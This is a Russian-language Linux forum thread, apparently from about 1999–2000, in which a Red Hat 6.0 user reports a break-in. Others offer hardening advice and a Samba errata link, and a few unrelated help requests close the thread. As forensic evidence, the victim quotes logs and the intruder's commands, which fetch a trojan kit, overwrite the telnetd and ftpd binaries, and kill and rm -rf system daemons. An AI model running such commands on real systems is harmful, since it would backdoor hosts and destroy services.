Че-та по Фингеру другое выдается :)

А - дык я ужо столько писем всем разослал, что или ему сообщили чтоб фингера прикрыл, либо... А ваще я встретил в ирке некоего tekhead@24.13.206.29 * I'm to lame to read BitchX.doc * +#hackphreak #austin austin.tx.us.undernet.org ([199.170.91.114] Illuminati Online - www.io.com) Это конечно ничего не значит, но похоже взломщик любит создавать имена юзеров tek, у меня он создал юзеров t c полным именем Tech Admin и own... А ваще это случилось через пару дней после того как я запустил IMAP и не запретил его снаружи фаервола. Вот я и спрашиваю, кто-нить встречал эксплоиты для стандартного Red Hat 6.0 без патчей?

Расскажи, плз, как он тебя конкретно сломал... Ну, и все-такое. Что сделал, кроме юзера и IRC и т.д. Очень интересно посмотреть. Что у тебя за компутер? Сервер? Или что... Как этот отстойник узнал о тебе...

Расскажи, плз, как он тебя конкретно сломал... Ну, и все-такое. Гы, а я знаю? Я думал мне скажут. :)Может через имап, может через ftp может через аську за фаерволом, так называемым. Вот я и в страшных сомнениях, то ли перейти на BSD, то ли кажный день с редхата патчи качать... :) А ваще удивительно, в ирках в чатах по линуксу одни роботы торчат...

Дк, а что он сделал конкретно? Он получил rootа доступ?

> Вот я и в страшных сомнениях, то ли перейти на BSD, то ли кажный день с редхата патчи качать... :)
Руки выпрямить надо ;)
Можно подумать ты BSD лучше поддерживать сможешь ;)
Хочешь real security - поставь что угодно - настрой правильно - ставь патчи - веди аудит.
Все ;)

Сам не сталкивался, но много слышал о полной
отстойности imap. Обычно его выключают.
Никогда не заходи в chat или в аську из-под
root. Это страшная дыра.
ftp вроде бы ломается при наличии директорий на
запись, если все (в ftp директориях) закрыто на
запись, то и ломать нечего.
Лично сталкивался с дырами в Netscape при включенной
JavaScript. В норме его нужно вырубить (и врубать по
нужде на некоторых сайтах).
Поставь лучше Slack, он не гонится за Win юзерами
и больше внимания уделяет добротности.

>Дк, а что он сделал конкретно? Он получил rootа доступ? Рассказываю в подробностях. Телнет наружу закрыт, открыт IMAP, POP3, FTP, HTTP, SNTP, SNMP, LOGIN, AUTH. Feb 24 07:01:20 etc kernel: Packet log: inet-in DENY ppp0 PROTO=6 24.108.26.113:1082 my.ip.add.res:23 L=60 S=0x00 I=21814 F=0x4000 T=44 Feb 24 07:02:26 etc pam_rhosts_auth[30839]: denied to root@software.powersurfr.com as t: access not allowed Отродясь у меня юзера t не было... А через десять секунд: Feb 24 07:02:36 etc PAM_pwdb[30840]: (login) session opened for user t by (uid=0) Ну и он пихает троянов: ftp matronweb.com mkdir ".btm " mv btm.tar ".btm " cd ".btm " tar -xvf btm.tar make ./btm /usr/sbin/in.telnetd ./btm /usr/sbin/in.ftpd rm -rf btm.tar cd .. Не буду показывать как он от имени моего юзера бота поставил... :) Потом в обед он опять лезет. Меня весь день не было рядом... Feb 24 12:20:15 etc pam_rhosts_auth[32461]: denied to nobody@slip166-72-70-33.ca.us.prserv.net as nobody: access not allowed Я потом фингером лазил на software.powersurfr.com, там оказался тот же юзер Tech Admin заходивший с slip166-72-70-33.ca.us.prserv.net, то есть powersurfr был уже им схвачен видать... Он им маскировался, но как-то слабо... Feb 24 12:20:15 etc PAM_pwdb[32461]: get passwd; pwdb: structure is no longer valid Feb 24 12:20:16 etc in.rlogind[32461]: PAM authentication failed for in.rlogind Feb 24 12:20:34 etc pam_rhosts_auth[32463]: denied to root@software.powersurfr.com as t: access not allowed Feb 24 12:20:53 etc PAM_pwdb[32464]: (login) session opened for user t by (uid=0) И наверно это уже после этого происходило: killall -9 rpc.statd rpc.rquoatd atd nfsd killall -9 lockd rpciod smbd nmbd killall -9 amd apmd amq lpd killall -9 rpc.rquotad rpc.mountd nfsd killall -9 lockd rpciod gpm rm -rf /usr/sbin/rpc.statd /usr/sbin/atd /usr/sbin/rpc.rquotad rm -rf /usr/sbin/lockd /usr/bin/lockd rm -rf /usr/sbin/nfsd /usr/bin/nfsd rm -rf /usr/sbin/rpciod /usr/bin/rpciod rm -rf /usr/sbin/smbd /usr/bin/smbd rm -rf /usr/sbin/nmbd /usr/bin/nmbd rm -rf /usr/sbin/apmd /usr/bin/apmd rm -rf /usr/sbin/amd /usr/bin/amd rm -rf /usr/sbin/amq /usr/bin/amq rm -rf /usr/sbin/named rm -rf /usr/sbin/portmap killall -9 named killall -9 portmap exi И как-то странно стал работать _upsd слушая 5454 5455 порты... Он им тоже интересовался, но логов нет... Хотя сам _upsd остался, в отличии от in.telned in.ftpd которые я грохнул... Может он логи специально подбросил? Для отмазки? Хотя вряд ли... Ну и какие будут коментарии? В /etc валяется парочка исполняемых файлов... Но это врядли... Кстати, забыл добавить, самба тож наружу смотрела, хотя никаких каталогов публичных не давала, и на всякие имена демонов\гостей не отзывалась... Впрочем попытки были: [1999/12/08 21:00:56, 1] smbd/password.c:pass_check_smb(506) Account for user 'nobody' was disabled. [1999/12/08 21:00:56, 1] smbd/password.c:pass_check_smb(506) Account for user 'nobody' was disabled. [1999/12/08 21:01:52, 0] passdb/smbpass.c:getsmbfile21pwent(339) getsmbfile21pwent: smbpasswd database is corrupt! [1999/12/08 21:01:52, 0] passdb/smbpass.c:getsmbfile21pwent(340) getsmbfile21pwent: username postgres not in unix passwd database! [1999/12/08 21:02:09, 1] smbd/password.c:pass_check_smb(506) Account for user 'root' was disabled. [1999/12/08 21:02:09, 1] smbd/password.c:pass_check_smb(506) Account for user 'root' was disabled. Мож кто накажет заокеанских нахалов ? :) log.armagedoon [1999/11/29 23:17:01, 1] smbd/password.c:pass_check_smb(492) Couldn't find user 'russian vania' in UNIX password database. [1999/12/01 23:28:30, 1] smbd/password.c:pass_check_smb(492) Couldn't find user 'russian vania' in UNIX password database.

На мой взгляд, здесь нужно подумать о
своей машине а не о наказании для нахала.
Вполне вероятно, что залез он с чужого
компьютера и стоит послать обстоятельное
письмо root-у этого компа (и наверно на соседнии
IP --- может они в одной локальной сети ---
это можно попробывать выяснить и обычными
методами).

Хи... А че такое russian vania???

rm -rf стучит в моем сердце. :) А в остальном - я именно так и сделал, странно, что ты этого не заметил в других ответах... To finger: admin@24.108.26.113 Login: tek Name: Tech Admin Directory: /tmp Shell: /bin/bash On since Tue Feb 22 17:46 (MST) on pts/7 from slip166-72-82-20.ca.us.prserv.net 8 hours 51 minutes idle No mail. No Plan. tekhead@24.13.206.29 * I'm to lame to read BitchX.doc * +#hackphreak #austin austin.tx.us.undernet.org ([199.170.91.114] Illuminati Online - www.io.com) Интересно, было бы фингером пройтись...

Мне интереснее, что такое вот это: [1999/12/08 21:01:52, 0] passdb/smbpass.c:getsmbfile21pwent(339) getsmbfile21pwent: smbpasswd database is corrupt!

rm -rf / наверно еще больше бы стучало :)

IMHO:

http://www.redhat.com/support/errata/RHSA1999022_02.html
roblem description:
Several security issues were present in earlier samba releases. -
a denial-of-service attack could be performed against nmbd. - a

! buffer overflow was present in the message service in smbd

(not enabled by default under Red Hat Linux) - a race condition was
present in smbmnt that could cause problems if installed setuid
root (it is not installed setuid root by default under Red Hat
Linux 6.0, and is not present under Red Hat Linux 4.2 or 5.2)

Мораль -- читайте эрату и не пеняйте на kiddiзов, они ... (censored)

Еще совет: переходи на fBSD, хоть стыдно за тебя не будет больше.
RedHat грамотный человек так не устанавливает.
Cheers

HELP!!!!!!!

Hi!!! Киньте PLZ мне на kosoylox@mail.ru инфу про то, где достать такую инфу, про настройку на одной сетке Linux RedHat, Windows NT 4.0 Server, Win9x, Dos, Novell Netware, Apache(linux, win NT/98) - чтоб вы между собой связать и чтоб все меж собой взаимодействовало ... P.S. Только, пожалуйста именно на e-mail, а то у меня инета почти нет...

Помогите прикрутить 8-и портовку Specialix к RH 6.0, к RH 5.2 прикручивал работает, может чё ещё в ядре повключать надо?

Я недавно установил Linux RedHat 6.0 на свою машину впервые и при загрузке компа у меня вместо LILO вылазит бесконечный набор нулей и единиц. Если вам не трудно, то плиз напишите мне письмо на the_slim@rambler.ru с ответом на вопрос: "Что делать???!!!" Заранее благодарен, Игорь.